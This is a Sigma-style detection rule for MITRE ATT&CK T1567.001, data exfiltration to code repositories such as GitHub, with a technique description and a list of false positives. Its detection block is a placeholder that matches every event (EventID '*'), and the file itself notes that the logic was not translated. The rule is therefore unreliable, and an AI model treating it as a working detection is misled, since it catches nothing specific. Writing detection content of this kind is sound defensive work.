title: Exfiltration to Code Repository (T1567.001)
id: df00tech-t1567-001
status: experimental
description: "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection. Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. Tools such as Empire have been observed using GitHub for data exfiltration, leveraging the GitHub API to stage and retrieve data as part of a C2 channel."
references:
  - https://attack.mitre.org/techniques/T1567/001/
  - https://df00tech.com/detections/T1567.001
author: df00tech
date: 2026/04/21
tags:
  - attack.t1567.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Software developers legitimately pushing code to GitHub or GitLab as part of normal development workflow — especially on developer workstations
  - "CI/CD pipeline agents (Jenkins build servers, GitHub Actions self-hosted runners, GitLab CI runners) performing automated builds and deployments that push artifacts or release assets"
  - "Developer IDEs with integrated Git (VS Code, IntelliJ, Visual Studio) performing background sync, auto-push on save, or pull request creation via API"
  - Backup and configuration management scripts that legitimately use GitHub/GitLab as a storage backend for infrastructure-as-code or configuration files
  - "Security tools such as Dependabot, Renovate, or Snyk that create automated pull requests by pushing fix branches to repositories"
level: high